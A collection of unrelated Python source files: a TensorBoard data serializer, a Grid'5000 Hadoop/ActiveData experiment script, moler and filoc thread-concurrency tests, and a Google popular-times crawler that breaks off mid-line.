import gzip import json import os import os.path import shutil import StringIO import threading import urllib import six from six.moves import http_client import tensorflow as tf from tensorflow.python.summary import event_multiplexer from tensorflow.tensorboard.backend import server tf.flags.DEFINE_string('logdir', None, """the logdir to pass to the TensorBoard backend; data will be read from this logdir for serialization.""") tf.flags.DEFINE_string('target', None, """The directoy where serialized data will be written""") tf.flags.DEFINE_boolean('overwrite', False, """Whether to remove and overwrite TARGET if it already exists.""") tf.flags.DEFINE_boolean( 'purge_orphaned_data', True, 'Whether to purge data that ' 'may have been orphaned due to TensorBoard restarts. ' 'Disabling purge_orphaned_data can be used to debug data ' 'disappearance.') FLAGS = tf.flags.FLAGS BAD_CHARACTERS = "#%&{}\\/<>*? $!'\":@+`|=" def Url(route, params): """Takes route and query params, and produce encoded url for that asset.""" out = route if params: # sorting ensures a unique filename for each query sorted_params = sorted(six.iteritems(params)) out += '?' + urllib.urlencode(sorted_params) return out def Clean(s): """Clean a string so it can be used as a filepath.""" for c in BAD_CHARACTERS: s = s.replace(c, '_') return s class TensorBoardStaticSerializer(object): """Serialize all the routes from a TensorBoard server to static json.""" def __init__(self, connection, target_path): self.connection = connection EnsureDirectoryExists(os.path.join(target_path, 'data')) self.path = target_path def GetAndSave(self, url, unzip=False): """GET the given url. Serialize the result at clean path version of url.""" self.connection.request('GET', '/data/' + url, headers={'content-type': 'text/plain'}) response = self.connection.getresponse() destination = self.path + '/data/' + Clean(url) if response.status != 200: raise IOError(url) if unzip: s = StringIO.StringIO(response.read()) content = gzip.GzipFile(fileobj=s).read() else: content = response.read() with open(destination, 'w') as f: f.write(content) return content def GetRouteAndSave(self, route, params=None): """GET given route and params. Serialize the result. Return as JSON.""" url = Url(route, params) return json.loads(self.GetAndSave(url)) def Run(self): """Serialize everything from a TensorBoard backend.""" # get the runs object, which is an index for every tag. runs = self.GetRouteAndSave('runs') # collect sampled data. self.GetRouteAndSave('scalars') # now let's just download everything! for run, tag_type_to_tags in six.iteritems(runs): for tag_type, tags in six.iteritems(tag_type_to_tags): try: if tag_type == 'graph': # in this case, tags is a bool which specifies if graph is present. if tags: url = Url('graph', {'run': run}) self.GetAndSave(url, unzip=True) elif tag_type == 'images': for t in tags: images = self.GetRouteAndSave('images', {'run': run, 'tag': t}) for im in images: url = 'individualImage?' + im['query'] # pull down the images themselves. self.GetAndSave(url) else: for t in tags: # Save this, whatever it is :) self.GetRouteAndSave(tag_type, {'run': run, 'tag': t}) except IOError as e: PrintAndLog('Retrieval failed for %s/%s/%s' % (tag_type, run, tags), tf.logging.WARN) PrintAndLog('Got Exception: %s' % e, tf.logging.WARN) PrintAndLog('continuing...', tf.logging.WARN) continue def EnsureDirectoryExists(path): if not os.path.exists(path): os.makedirs(path) def PrintAndLog(msg, lvl=tf.logging.INFO): tf.logging.log(lvl, msg) print(msg) def main(unused_argv=None): target = FLAGS.target logdir = FLAGS.logdir if not target or not logdir: PrintAndLog('Both --target and --logdir are required.', tf.logging.ERROR) return -1 if os.path.exists(target): if FLAGS.overwrite: if os.path.isdir(target): shutil.rmtree(target) else: os.remove(target) else: PrintAndLog('Refusing to overwrite target %s without --overwrite' % target, tf.logging.ERROR) return -2 path_to_run = server.ParseEventFilesSpec(FLAGS.logdir) PrintAndLog('About to load Multiplexer. This may take some time.') multiplexer = event_multiplexer.EventMultiplexer( size_guidance=server.TENSORBOARD_SIZE_GUIDANCE, purge_orphaned_data=FLAGS.purge_orphaned_data) server.ReloadMultiplexer(multiplexer, path_to_run) PrintAndLog('Multiplexer load finished. Starting TensorBoard server.') s = server.BuildServer(multiplexer, 'localhost', 0) server_thread = threading.Thread(target=s.serve_forever) server_thread.daemon = True server_thread.start() connection = http_client.HTTPConnection('localhost', s.server_address[1]) PrintAndLog('Server setup! Downloading data from the server.') x = TensorBoardStaticSerializer(connection, target) x.Run() PrintAndLog('Done downloading data.') connection.close() s.shutdown() s.server_close() if __name__ == '__main__': tf.app.run()
experiment.py
#!/usr/bin/env python import traceback import logging, time, datetime, signal import pprint, os, sys, math pp = pprint.PrettyPrinter(indent=4).pprint from threading import Thread from time import sleep import execo as EX from string import Template from execo import configuration from execo.log import style from execo.process import ProcessOutputHandler import execo_g5k as EX5 from execo_g5k.api_utils import get_cluster_site from execo_engine import Engine, ParamSweeper, logger, sweep, sweep_stats, slugify from hadoop_g5k import HadoopCluster, HadoopJarJob #EX.logger.setLevel(logging.ERROR) #logger.setLevel(logging.ERROR) #EXCLUDED_ELEMENTS = ['paranoia-4', 'paranoia-7', 'paranoia-8'] EXCLUDED_ELEMENTS = [] # Shortcut funk = EX5.planning job_name = 'ActiveDataHadoop' job_path = "/root/hduser/terasort-" default_ad_cluster = 'parapide' default_work_cluster = 'paranoia' default_n_nodes = 5 default_walltime = "3:00:00" XP_BASEDIR = '/home/ansimonet/active_data_hadoop' AD_JAR_NAME = 'active-data-lib-0.2.0.jar' HADOOP_LOG_PATH = '/tmp/hadoop/logs/' AD_RESULT_PATH = '/tmp/transitions_per_second.log' HADOOP_OPTIONS = '-Ddfs.namenode.handler.count=40 ' + \ '-Ddfs.datanode.handler.count=10' + \ '-Dmapreduce.map.output.compress=true ' + \ '-Dmapreduce.map.output.compress.codec=org.apache.hadoop.io.compress.GzipCodec ' + \ '-Dmapred.child.java.opts=\'-Xms%d\'' class ad_hadoop(Engine): def __init__(self): """Define options for the experiment""" super(ad_hadoop, self).__init__() self.options_parser.add_option("-k", dest="keep_alive", help="Keep the reservation alive.", action="store_true") self.options_parser.add_option("-j", dest="job_id", help="job_id to relaunch an engine.", type=int) self.options_parser.add_option("--ad-cluster", default=default_ad_cluster, help="The cluster on which to run ActiveData.") self.options_parser.add_option("--work-cluster", default=default_work_cluster, help="The cluster on which to run Hadoop.") self.options_parser.add_option("--n-nodes", default=default_n_nodes, type=int, help="The number of nodes to use.") self.options_parser.add_option("--n-reducers", type=int, help="The number of reducers to use.") self.options_parser.add_option("--walltime", default=default_walltime, help="The duration of the experiment.") self.options_parser.add_option("--size", type=int, help="Dataset size (in GB)") def run(self): """Perform experiment""" logger.detail(self.options) try: # Checking the options if self.options.n_reducers is None or self.options.size is None: logger.error("Both --n-reducer and --size are mandatory.") exit(1) # Retrieving the hosts for the experiment hosts = self.get_hosts() if hosts is None: logger.error("Cannot get host for request") exit(1) # Deploying OS and copying required file AD_node, hadoop_cluster = self.setup_hosts(hosts) # Starting the processes server = self._start_active_data_server(AD_node) listener = self._start_active_data_listener(AD_node) # Terasort takes the number of 100-byte rows to generate data_size_bytes = self.options.size * 1000 * 1000 * 1000 data_size = data_size_bytes / 100 # Use a mapper per core attr = EX5.get_host_attributes(self.options.work_cluster + '-1') n_cpu_per_node = attr['architecture']['smt_size'] mem_per_node = attr['main_memory']['ram_size'] n_mappers = int(n_cpu_per_node) * self.options.n_nodes mem_per_task = (int(mem_per_node) - 1000) / n_cpu_per_node # leave 1Gb out for the system logger.info("The experiment will use %s mappers and %s reducers", style.emph(n_mappers), style.emph(self.options.n_reducers)) logger.info("Using %s of memory for each task", style.emph(sizeof_fmt(mem_per_task))) # First Hadoop job to generate the dataset hadoop_stdout_path = os.path.join(self.result_dir, "hadoop.stdout") hadoop_stderr_path = os.path.join(self.result_dir, "hadoop.stderr") fout = open(hadoop_stdout_path, 'w') ferr = open(hadoop_stderr_path, 'w') logger.info("Generating a %s input file" % (sizeof_fmt(data_size_bytes))) generate = HadoopJarJob('jars/hadoop-examples-1.2.1.jar', "teragen -Dmapred.map.tasks=%d -Dmapred.tasktracker.map.tasks.maximum=%s %s %s %sinput" % (n_mappers, n_cpu_per_node, HADOOP_OPTIONS % mem_per_node, data_size, job_path)) gen_out, gen_err = hadoop_cluster.execute_job(generate) fout.write(gen_out) ferr.write(gen_err) # Create an Active Data life cycle for the input dataset cmd = "java -cp \"jars/*\" org.inria.activedata.examples.cmdline.PublishNewLifeCycle %s %s %s" % \ (AD_node, "org.inria.activedata.hadoop.model.HDFSModel", job_path + "input") create_lc = EX.Process(cmd) create_lc.start() create_lc.wait() logger.info(create_lc.stdout) if not create_lc.ok: logger.error(create_lc.stderr) exit(1) # Start the second Hadoop job on a separate thread: the actual benchmark sort = HadoopJarJob('jars/hadoop-examples-1.2.1.jar', "terasort -Dmapred.reduce.tasks=%d -Dmapred.map.tasks=%d -Dmapred.tasktracker.map.tasks.maximum=%s -Dmapred.tasktracker.reduce.tasks.maximum=%s %s %sinput " "%soutput" % (self.options.n_reducers, n_mappers, n_cpu_per_node, n_cpu_per_node, HADOOP_OPTIONS % mem_per_node, job_path, job_path)) def run_sort(sort, fout, ferr): sort_out, sort_err = hadoop_cluster.execute_job(sort) fout.write(sort_out) ferr.write(sort_err) sort_thread = Thread(target=run_sort, args=(sort, fout, ferr), name="sort") sort_thread.start() # Publish the composition transition as soon as we got the Hadoop job_id while sort.job_id == "unknown": sleep(0.1) logger.info("The id of the sort job is " + sort.job_id) cmd = "java -cp \"jars/*\" org.inria.activedata.examples.cmdline.PublishTransition %s -m \ org.inria.activedata.hadoop.model.HDFSModel -t 'HDFS.create Hadoop job' -sid HDFS \ -uid %sinput -newId %s" \ % (AD_node, job_path, sort.job_id[4:]) compose = EX.Process(cmd) compose.start() compose.wait() logger.info(compose.stdout) if(not compose.ok): logger.error(compose.stderr) exit(1) # Start the scrappers, tell them to pay attention only to the sort job clients = self._start_active_data_clients(AD_node, hadoop_cluster, only=sort.job_id[4:]) # Wait for the sort job to complete sort_thread.join() # Leave a few seconds for all the scrapers to do their job sleep(600) fout.close() ferr.close() # Terminate everything clients.kill() listener.kill() # Kindly ask the service to quit EX.Process('java -cp "jars/*" org.inria.activedata.examples.cmdline.EndExperiment ' \ + server.host.address\ + ' ' + AD_RESULT_PATH).run() # Get the logs back from the machines self._get_logs(hadoop_cluster, server.host) finally: hadoop_cluster.stop() if not self.options.keep_alive: EX5.oardel([(self.job_id, self.site)]) exit() def _start_active_data_clients(self, server, hadoop_cluster, port=1200, hdf_path='/root/hduser/terasort-input', only=""): """Return a started client action""" if only != "": only = "-o " + only cmd = "java -cp 'jars/*' -Dlog4j.configurationFile=log4j2.xml " + \ "org.inria.activedata.hadoop.HadoopScrapper " +\ server + " " + HADOOP_LOG_PATH + "hadoop-root-tasktracker-{{{host}}}.log " + only tasktracker = EX.Remote(cmd, hadoop_cluster.hosts) # Don't print a warning when the jobs are killed for p in tasktracker.processes: p.nolog_exit_code = p.ignore_exit_code = True cmd = "java -cp 'jars/*' -Dlog4j.configurationFile=log4j2.xml " + \ "org.inria.activedata.hadoop.HadoopScrapper " +\ server + " " + HADOOP_LOG_PATH + "hadoop-root-jobtracker-{{{host}}}.log " + only jobtracker = EX.Remote(cmd, [hadoop_cluster.master]) for p in jobtracker.processes: p.nolog_exit_code = p.ignore_exit_code = True clients = EX.ParallelActions([tasktracker, jobtracker]) # Setup output handlers for p in clients.processes: # Treat the jobtracker scraper differently if "jobtracker" in p.remote_cmd: stdout = os.path.join(self.result_dir, 'scrapper-jobtracker.stdout') stderr = os.path.join(self.result_dir, 'scrapper-jobtracker.stderr') else: stdout = os.path.join(self.result_dir, 'scrapper-' + p.host.address + '.stdout') stderr = os.path.join(self.result_dir, 'scrapper-' + p.host.address + '.stderr') p.stdout_handlers.append(stdout) p.stderr_handlers.append(stderr) clients.start() return clients def _start_active_data_listener(self, ad_server, port=1200, hdf_path='/root/hduser/terasort-input'): """Return a started listener process""" cmd = "java -cp 'jars/*' org.inria.activedata.hadoop.HadoopListener %s %s %s" \ % (ad_server, port, hdf_path) out_path = os.path.join(self.result_dir, "listener") listener = EX.SshProcess(cmd, ad_server) listener.stdout_handlers.append(out_path + ".stdout") listener.stderr_handlers.append(out_path + ".stderr") listener.nolog_exit_code = listener.ignore_exit_code = True listener.start() return listener def _start_active_data_server(self, ad_server): """Return a started server process""" stdout_path = os.path.join(self.result_dir, "server.stdout") stderr_path = os.path.join(self.result_dir, "server.stderr") options = "-Djava.security.policy=server.policy " \ + "-server -Xmx1G -Xmx10G" cmd = "java " + options + " -cp \"jars/*\" org.inria.activedata.examples.cmdline.RunService -vv" logger.info("Running command " + cmd) server = EX.SshProcess(cmd, ad_server) server.stdout_handlers.append(stdout_path) server.stderr_handlers.append(stderr_path) server.nolog_exit_code = server.ignore_exit_code = True server.start() logger.info("Active Data Service started on " + server.host.address) time.sleep(2) if not server.running: logger.error("Active Data Service crashed\n %s \n%s", server.stdout, server.stderr) return False return server def setup_hosts(self, hosts): """Deploy operating setup active data on the service node and Hadoop on all""" logger.info('Deploying hosts') deployed_hosts, _ = EX5.deploy(EX5.Deployment(hosts=hosts, env_name="wheezy-x64-prod")) # Copy the jars required by Active Data EX.Put(hosts, [XP_BASEDIR + '/jars']).run() # Active Data server AD_node = filter(lambda x: self.options.ad_cluster in x, deployed_hosts)[0] EX.Put(hosts, [XP_BASEDIR + '/server.policy']).run() EX.Put(hosts, [XP_BASEDIR + '/log4j2.xml']).run() # Hadoop Cluster deployed_hosts.remove(AD_node) workers = [EX.Host(host) for host in list(deployed_hosts)] EX.Put(workers, ['~/.ssh/']).run() logger.info('Creating Hadoop cluster on %s', ' '.join([style.host(host.address) for host in workers])) cluster = HadoopCluster(workers) cluster.bootstrap('hadoop-1.2.1.tar.gz') cluster.initialize() cluster.start() return AD_node, cluster def get_hosts(self): """Returns the hosts from an existing reservation if provided, or from a new reservation""" logger.info('Retrieving hosts list') self.site = get_cluster_site(self.options.ad_cluster) self.job_id = self.options.job_id if self.options.job_id\ else self._make_reservation(self.site) if not self.job_id: return None EX5.wait_oar_job_start(self.job_id, self.site) return EX5.get_oar_job_nodes(self.job_id, self.site) def _make_reservation(self, site): """Make a new reservation""" elements = {self.options.ad_cluster: 1, self.options.work_cluster: self.options.n_nodes} logger.info('Finding slot for the experiment ' '\nActiveData %s:1\nHadoop %s:%s', style.host(self.options.ad_cluster).rjust(5), style.emph(self.options.work_cluster).rjust(5), style.emph(self.options.n_nodes)) planning = funk.get_planning(elements) slots = funk.compute_slots(planning, walltime=self.options.walltime, excluded_elements=EXCLUDED_ELEMENTS) slot = funk.find_free_slot(slots, elements) if not slot[0]: return None startdate = slot[0] resources = funk.distribute_hosts(slot[2], elements, excluded_elements=EXCLUDED_ELEMENTS) jobs_specs = funk.get_jobs_specs(resources, name=job_name, excluded_elements=EXCLUDED_ELEMENTS) print jobs_specs sub, site = jobs_specs[0] sub.additional_options = "-t deploy" sub.reservation_date = startdate sub.walltime = self.options.walltime jobs = EX5.oarsub([(sub, site)]) job_id = jobs[0][0] logger.info('Job %s will start at %s', style.emph(job_id), style.log_header(EX.time_utils.format_date(startdate))) return job_id def _get_logs(self, hadoop_cluster, service_host): # Output from the jobtracker EX.Get([hadoop_cluster.master], [HADOOP_LOG_PATH + "hadoop-root-jobtracker-{{{host}}}.log"], local_location=self.result_dir).run() # Output from the tasktrackers logger.info(hadoop_cluster.hosts) EX.Get(hadoop_cluster.hosts, [HADOOP_LOG_PATH + "hadoop-root-tasktracker-{{{host}}}.log"], local_location=self.result_dir).run() # The actual measure, on the service EX.Get([service_host], [AD_RESULT_PATH], local_location=self.result_dir).run() EX.Remote('rm -f ' + AD_RESULT_PATH, [service_host]).run() # We don't want to interfere with the next experiment def sizeof_fmt(num, suffix='B'): for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']: if abs(num) < 1000.0: return "%3.1f%s%s" % (num, unit, suffix) num /= 1000.0 return "%.1f%s%s" % (num, 'Y', suffix) def timestamp2str(timestamp): return datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S") def prediction(timestamp): start = timestamp2str(timestamp) ad_hadoop._log("Waiting for job to start (prediction: {0})".format(start), False) class FileOutputHandler(ProcessOutputHandler): __file = None def __init__(self, path): super(ProcessOutputHandler, self).__init__() self.__file = open(path, 'a') def __del__(self): self.__file.flush() self.__file.close() def read(self, process, string, eof=False, error=False): self.__file.write(string) self.__file.flush() def read_line(self, process, string, eof=False, error=False): self.__file.write(time.localtime().strftime("[%d-%m-%y %H:%M:%S")) self.__file.write(' ') self.__file.write(string) self.__file.flush() ################### # Main ################### if __name__ == "__main__": engine = ad_hadoop() engine.start()
test_connection_observer_with_runner.py
# -*- coding: utf-8 -*- """ Testing connection observer with runner based on threads - call as function (synchronous) - call as future (asynchronous) """ __author__ = 'Grzegorz Latuszek' __copyright__ = 'Copyright (C) 2018, Nokia' __email__ = 'grzegorz.latuszek@nokia.com' import threading import time import pytest from moler.connection_observer import ConnectionObserver def test_calling_connection_observer_returns_result(net_down_detector_and_ping_output): """Connection observer should behave like function for synchronous call""" connection_observer, ping_lines = net_down_detector_and_ping_output def inject_data(): time.sleep(0.3) for line in ping_lines: time.sleep(0.1) moler_conn = connection_observer.connection moler_conn.data_received(line) ext_io = threading.Thread(target=inject_data) try: # we use it as function so we want verb: detect_network_down = connection_observer ext_io.start() result = detect_network_down() assert detect_network_down.done() assert result == detect_network_down.result() finally: # test cleanup ext_io.join() def test_connection_observer_behaves_like_future(net_down_detector_and_ping_output): """For async call""" connection_observer, ping_lines = net_down_detector_and_ping_output def inject_data(): time.sleep(0.3) for line in ping_lines: time.sleep(0.1) moler_conn = connection_observer.connection moler_conn.data_received(line) ext_io = threading.Thread(target=inject_data) try: # we use it as future so we want noun: network_down_detector = connection_observer ext_io.start() future = network_down_detector.start() assert not future.done() assert not future.cancelled() assert future == network_down_detector time.sleep(0.1) # give concurrency-of-future a chance to gain control assert future.running() result = network_down_detector.await_done(timeout=2.0) assert result == network_down_detector.result() finally: # test cleanup ext_io.join() # TODO: tests for error cases # --------------------------- resources --------------------------- class NetworkDownDetector(ConnectionObserver): def __init__(self, connection=None): super(NetworkDownDetector, self).__init__(connection=connection) def data_received(self, data): """ Awaiting change like: 64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms ping: sendmsg: Network is unreachable """ if not self.done(): if "Network is unreachable" in data: when_detected = time.time() self.set_result(result=when_detected) @pytest.fixture() def net_down_detector(): from moler.observable_connection import ObservableConnection moler_conn = ObservableConnection() observer = NetworkDownDetector(connection=moler_conn) return observer ping_output = ''' greg@debian:~$ ping 10.0.2.15 PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data. 64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms 64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms 64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms ping: sendmsg: Network is unreachable ping: sendmsg: Network is unreachable ping: sendmsg: Network is unreachable 64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms 64 bytes from 10.0.2.15: icmp_req=8 ttl=64 time=0.056 ms ''' @pytest.fixture() def net_down_detector_and_ping_output(net_down_detector): ping_lines = ping_output.splitlines(True) return net_down_detector, ping_lines
test_concurrency.py
""" Test """ import os import shutil import socket import tempfile import threading import time import unittest from threading import Thread from filoc import filoc from filoc.core import LockException # noinspection DuplicatedCode,PyMissingOrEmptyDocstring class TestFilocConcurrency(unittest.TestCase): def setUp(self): self.maxDiff = None self.test_dir = tempfile.mkdtemp().replace('\\', '/') self.loc = filoc(self.test_dir + r'/id={id:d}/myfile.json', writable=True) def tearDown(self): shutil.rmtree(self.test_dir) def test_lock_block(self): with self.loc.lock(): self.loc.write_content({'id' : 1, 'val' : 1}) res = self.loc.read_content(id=1) print(res) def test_lock_info(self): host = socket.gethostname() pid = os.getpid() thread = threading.get_ident() self.assertIsNone(self.loc.lock_info()) with self.loc.lock(): lock_info = self.loc.lock_info() self.assertEqual(lock_info['host'], host) self.assertEqual(lock_info['pid'], pid) self.assertEqual(lock_info['thread'], thread) self.loc.write_content({'id' : 1, 'val' : 1}) res = self.loc.read_content(id=1) print(res) self.assertIsNone(self.loc.lock_info()) def test_lock_force(self): self.loc.lock().__enter__() self.loc.lock_force_release() self.assertIsNone(self.loc.lock_info()) def test_lock_force2(self): with self.loc.lock(): self.loc.lock_force_release() self.assertIsNone(self.loc.lock_info()) def test_lock_reenter(self): with self.loc.lock(): with self.loc.lock(): pass def test_lock_enter_from_other_thread(self): state = 0 def wait_state_and_increment(expected_state): nonlocal state while state != expected_state: time.sleep(0.1) state += 1 def async_lock(): with self.loc.lock(): wait_state_and_increment(1) wait_state_and_increment(4) thread = Thread(target=async_lock) # BEGIN ASYNC PLAY wait_state_and_increment(0) # state 0 --> 1 thread.start() # state 1 --> 2 (then lock is set) wait_state_and_increment(2) # state 2 --> 3 try: with self.loc.lock(attempt_count=3, attempt_secs=0.2): self.fail("this line should never be called") except LockException: print("lock worked") finally: wait_state_and_increment(3) # state 3 --> 4 (trigger lock release) wait_state_and_increment(5) # state 5 --> 6 (lock released) if __name__ == '__main__': unittest.main()
crawler.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import calendar import datetime import json import logging import math import re import ssl import threading import urllib.request import urllib.parse from time import sleep, time from queue import Queue import requests from geopy import Point from geopy.distance import vincenty, VincentyDistance # urls for google api web service BASE_URL = "https://maps.googleapis.com/maps/api/place/" RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}" NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}" DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}" # user agent for populartimes request USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/54.0.2840.98 Safari/537.36"} class PopulartimesException(Exception): """Exception raised for errors in the input. Attributes: expression -- input expression in which the error occurred message -- explanation of the error """ def __init__(self, expression, message): self.expression = expression self.message = message def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top, circle_x, circle_y, radius): # returns true iff circle intersects rectangle def clamp(val, min, max): # limits value to the range min..max if val < min: return min if val > max: return max return val # Find the closest point to the circle within the rectangle closest_x = clamp(circle_x, rect_left, rect_right); closest_y = clamp(circle_y, rect_bottom, rect_top); # Calculate the distance between the circle's center and this closest point dist_x = circle_x - closest_x; dist_y = circle_y - closest_y; # If the distance is less than the circle's radius, an intersection occurs dist_sq = (dist_x * dist_x) + (dist_y * dist_y); return dist_sq < (radius * radius); def cover_rect_with_cicles(w, h, r): """ fully cover a rectangle of given width and height with circles of radius r. This algorithm uses a hexagonal honeycomb pattern to cover the area. :param w: width of rectangle :param h: height of reclangle :param r: radius of circles :return: list of circle centers (x,y) """ #initialize result list res = [] # horizontal distance between circle centers x_dist = math.sqrt(3) * r # vertical distance between circle centers y_dist = 1.5 * r # number of circles per row (different for even/odd rows) cnt_x_even = math.ceil(w / x_dist) cnt_x_odd = math.ceil((w - x_dist/2) / x_dist) + 1 # number of rows cnt_y = math.ceil((h-r) / y_dist) + 1 y_offs = 0.5 * r for y in range(cnt_y): if y % 2 == 0: # shift even rows to the right x_offs = x_dist/2 cnt_x = cnt_x_even else: x_offs = 0 cnt_x = cnt_x_odd for x in range(cnt_x): res.append((x_offs + x*x_dist, y_offs + y*y_dist)) # top-right circle is not always required if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r): res = res[0:-1] return res def get_circle_centers(b1, b2, radius): """ the function covers the area within the bounds with circles :param b1: south-west bounds [lat, lng] :param b2: north-east bounds [lat, lng] :param radius: specified radius, adapt for high density areas :return: list of circle centers that cover the area between lower/upper """ sw = Point(b1) ne = Point(b2) # north/east distances dist_lat = vincenty(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters dist_lng = vincenty(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters circles = cover_rect_with_cicles(dist_lat, dist_lng, radius) cords = [ VincentyDistance(meters=c[0]) .destination( VincentyDistance(meters=c[1]) .destination(point=sw, bearing=90), bearing=0 )[:2] for c in circles ] return cords def worker_radar(): """ worker that gets coordinates of queue and starts radar search :return: """ while True: item = q_radar.get() get_radar(item) q_radar.task_done() def get_radar(item): _lat, _lng = item["pos"] # places - nearby search # https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests radar_str = NEARBY_URL.format( _lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"] ) # is this a next page request? if item["res"] > 0: # possibly wait remaining time until next_page_token becomes valid min_wait = 2 # wait at least 2 seconds before the next page request sec_passed = time() - item["last_req"] if sec_passed < min_wait: sleep(min_wait - sec_passed) radar_str += "&pagetoken=" + item["next_page_token"] resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text) check_response_code(resp) radar = resp["results"] item["res"] += len(radar) if item["res"] >= 60: logging.warning("Result limit in search radius reached, some data may get lost") bounds = params["bounds"] # retrieve google ids for detail search for place in radar: geo = place["geometry"]["location"] if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \ and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]: # this isn't thread safe, but we don't really care, # since in worst case a set entry is simply overwritten g_places[place["place_id"]] = place # if there are more results, schedule next page requests if "next_page_token" in resp: item["next_page_token"] = resp["next_page_token"] item["last_req"] = time() q_radar.put(item) def worker_detail(): """ worker that gets item of queue and starts detailed data retrieval :return: """ while True: item = q_detail.get() get_detail(item) q_detail.task_done() def get_popularity_for_day(popularity): """ Returns popularity for day :param popularity: :return: """ # Initialize empty matrix with 0s pop_json = [[0 for _ in range(24)] for _ in range(7)] wait_json = [[0 for _ in range(24)] for _ in range(7)] for day in popularity: day_no, pop_times = day[:2] if pop_times: for hour_info in pop_times: hour = hour_info[0] pop_json[day_no - 1][hour] = hour_info[1] # check if the waiting string is available and convert no minutes if len(hour_info) > 5: wait_digits = re.findall(r'\d+', hour_info[3]) if len(wait_digits) == 0: wait_json[day_no - 1][hour] = 0 elif "min" in hour_info[3]: wait_json[day_no - 1][hour] = int(wait_digits[0]) elif "hour" in hour_info[3]: wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 else: wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1]) # day wrap if hour_info[0] == 23: day_no = day_no % 7 + 1 ret_popularity = [ { "name": list(calendar.day_name)[d], "data": pop_json[d] } for d in range(7) ] # waiting time only if applicable ret_wait = [ { "name": list(calendar.day_name)[d], "data": wait_json[d] } for d in range(7) ] if any(any(day) for day in wait_json) else [] # {"name" : "monday", "data": [...]} for each weekday as list return ret_popularity, ret_wait def index_get(array, *argv): """ checks if a index is available in the array and returns it :param array: the data array :param argv: index integers :return: None if not available or the return value """ try: for index in argv: array = array[index] return array # there is either no info available or no popular times # TypeError: rating/rating_n/populartimes wrong of not available except (IndexError, TypeError): return None def add_optional_parameters(detail_json, detail, rating, rating_n, popularity, current_popularity, time_spent): """ check for optional return parameters and add them to the result json :param detail_json: :param detail: :param rating: :param rating_n: :param popularity: :param current_popularity: :param time_spent: :return: """ if rating: detail_json["rating"] = rating elif "rating" in detail: detail_json["rating"] = detail["rating"] if rating_n: detail_json["rating_n"] = rating_n if "international_phone_number" in detail: detail_json["international_phone_number"] = detail["international_phone_number"] if current_popularity: detail_json["current_popularity"] = current_popularity if popularity: popularity, wait_times = get_popularity_for_day(popularity) detail_json["populartimes"] = popularity if wait_times: detail_json["time_wait"] = wait_times if time_spent: detail_json["time_spent"] = time_spent return detail_json def get_populartimes_from_search(place_identifier): """ request information for a place and parse current popularity :param place_identifier: name and address string :return: """ params_url = { "tbm": "map", "tch": 1, "hl": "en", "q": urllib.parse.quote_plus(place_identifier), "pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976" "!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1" "!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!" "1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e" "10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh" "qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!" "25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!" "1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1" "!3b1" } search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items()) logging.info("searchterm: " + search_url) # noinspection PyUnresolvedReferences gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT), context=gcontext) data = resp.read().decode('utf-8').split('/*""*/')[0] # find eof json jend = data.rfind("}") if jend >= 0: data = data[:jend + 1] jdata = json.loads(data)["d"] jdata = json.loads(jdata[4:]) # get info from result array, has to be adapted if backend api changes info = index_get(jdata, 0, 1, 0, 14) rating = index_get(info, 4, 7) rating_n = index_get(info, 4, 8) popular_times = index_get(info, 84, 0) # current_popularity is also not available if popular_times isn't current_popularity = index_get(info, 84, 7, 1) time_spent = index_get(info, 117, 0) # extract wait times and convert to minutes if time_spent: nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', 